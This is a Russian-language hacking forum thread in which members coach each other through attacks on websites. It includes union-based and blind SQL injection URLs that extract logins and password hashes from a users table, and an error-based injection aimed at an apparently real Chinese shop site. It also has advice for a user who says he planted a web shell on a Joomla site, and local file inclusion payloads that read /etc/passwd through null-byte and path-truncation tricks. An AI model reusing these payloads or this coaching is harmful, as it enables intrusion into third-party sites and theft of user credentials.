Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    mysql?
     
  2. [c0de]

    [c0de] New Member

    Joined:
    21 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    m00c0w
    да
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    test.ru/forum/viewtopic.php?id=1'+and+1=2+union+all+slelect+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+0,1+and+1='1

    А вообще если у тебя есть login и password - зачем тебе хэш ??
     
    _________________________
  4. [c0de]

    [c0de] New Member

    Joined:
    21 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    BigBear
    Так нету пароля, известно только что поле есть password а там хэш пароля
    Запрос не работает к сожалению. Страница меняется
    Суть такая, проверял наличие таблиц, если такая есть => страница без изменений
    Нету => пропадают стили, скрипты

    В запросе пробелы где нужно убрал если что.

    А куда запрос должен был то вывестись? Скуля то слепая:(
     
    #21124 [c0de], 29 Sep 2012
    Last edited: 29 Sep 2012
  5. Red[S1]

    Red[S1] Member

    Joined:
    23 Sep 2011
    Messages:
    9
    Likes Received:
    8
    Reputations:
    3
    а
    исправил на select ?
     
  6. [c0de]

    [c0de] New Member

    Joined:
    21 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Red[S1]
    да
    Все равно не катит
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Да, с slelect очепятался, бывает =)

    если блайнд то тут 2 вариант на выбор

    Code:
    test.ru/forum/viewtopic.php?id=1'+and+ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+[COLOR=Magenta]0[/COLOR],1),[COLOR=Magenta]1[/COLOR],1)>[COLOR=Magenta]50[/COLOR]+and+1='1
    
    или

    Code:
    test.ru/forum/viewtopic.php?id=1+and+1=IF(ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+[COLOR=Magenta]0[/COLOR],1),[COLOR=Magenta]1[/COLOR],1)>[COLOR=Magenta]50[/COLOR],1,2)+and+1='1
    
    Цветом выделены динамические переменные

    1ая отвечает за номер записи в бд users_am (по дефолту идёт считывание данных из 1-ой записи)

    2ая отвечает за порядок извлекаемого символа из строки id:login: password (по дефолту идёт извлечение первого символа)

    3ья отвечает за код ascii символа в десятичном формате (Dec), по нему будешь ориентироваться, какой символ стоит на каком месте

    Если в процессе будешь получить НЕ ПУСТУЮ страницу - значит запрос получился верный.

    То есть в id:login: password на {1} строке таблицы users_am на позиции {2} находится ascii символ {3}

    Знаю, что сложнова-то для восприятия, но как мог так помог =)
     
    _________________________
  8. Halahack

    Halahack Banned

    Joined:
    25 Aug 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by=1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?
     
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    К таким вопросам обычно прилагается ссылка на сайт для помощи.

    (с) Телепаты в отпуске !!!
     
    _________________________
  10. Halahack

    Halahack Banned

    Joined:
    25 Aug 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    http://lonyung.com.cn/buy.php?id=`76
     
  11. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605


    http://lonyung.com.cn/buy.php?id=76 and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2)) x from nformation_schema.tables group by x)a)
     
    _________________________
    1 person likes this.
  12. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    Красным выделено, ЧТО за знак равно?
     
    _________________________
  13. Halahack

    Halahack Banned

    Joined:
    25 Aug 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Та то вместо + случайно поставил.
     
  14. diny

    diny New Member

    Joined:
    2 Feb 2011
    Messages:
    92
    Likes Received:
    1
    Reputations:
    0
    Прошу помощи
    расскажите про уязвимость HTTP Verb Tampering
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    google: "уязвимость HTTP Verb Tampering"
    сразу же первая ссылка с рассказом об этой уязвимости.

    P.S: Тоже почитаю)
     
    _________________________
    1 person likes this.
  16. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    залил shell на сайт joomla теперь вижу все файлы на сервере,подскажите пожалуйста как узнать под каким пользователем и с какими правами я там нахожусь? Некоторые папки и файлы не могу просматривать,такие как master.passwd и т.д,файл passwd просматривать могу.Извените за ламерский вопрос,новичёк.Спасибо.
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Верхний левый угол - Group = , Id =

    Или команда в конcоли

    whoami

    id
     
    _________________________
  18. 0o Chris o0

    0o Chris o0 New Member

    Joined:
    16 Oct 2011
    Messages:
    142
    Likes Received:
    1
    Reputations:
    0
    PHP:
    include($_GET['file'] . '.html');
    Почему то после первого обращения к include.php?file=../../../../../../../etc/passwd%00 вылетает ошибка:

    Code:
    Warning: include(): Failed opening '../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/include.php on line 2 
    А после последующих:

    Code:
     Warning: include(../../../../../../../etc/[COLOR=Red][B]passwd.html[/B][/COLOR]): failed to open stream: No such file or directory in /var/www/include.php on line 2 Warning: include(): Failed opening '../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/include.php on line 2 
    То есть нулл-байт не обрезает расширение. Приходится чистить кэш или перезапускать браузер.
    magic_quotes_gpc = off.
     
  19. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    попробуй вместо нулл байта 4096 слешей
    ../../../../../../../etc/passwd/////////////////////////////...
     
  20. 0o Chris o0

    0o Chris o0 New Member

    Joined:
    16 Oct 2011
    Messages:
    142
    Likes Received:
    1
    Reputations:
    0
    Только хотел про это написать) Подставил вместо нулл-байта 2500 повторений /.
    Получилась такая строка ../../../../../../../etc/passwd/./././.[...]/./.
    В таком случае все время ошибка:
    Code:
    Warning: include(../../../../../../../etc/passwd/././././.[...]/././././././. in /var/www/include.php on line 2 Warning: include(): Failed opening '../../../../../../../etc/passwd/./././././././.[...]/./././././. in /var/www/include.php on line 2 
    
    P.S. просто 4096 слэшей не будут работать, т.к. php обрабатывает их не так, как /. . /. удаляется полностью, а // меняются на /, в итоге в конце получим путь не к файлу, а к директории.
     
    #21140 0o Chris o0, 30 Sep 2012
    Last edited: 30 Sep 2012
Thread Status:
Not open for further replies.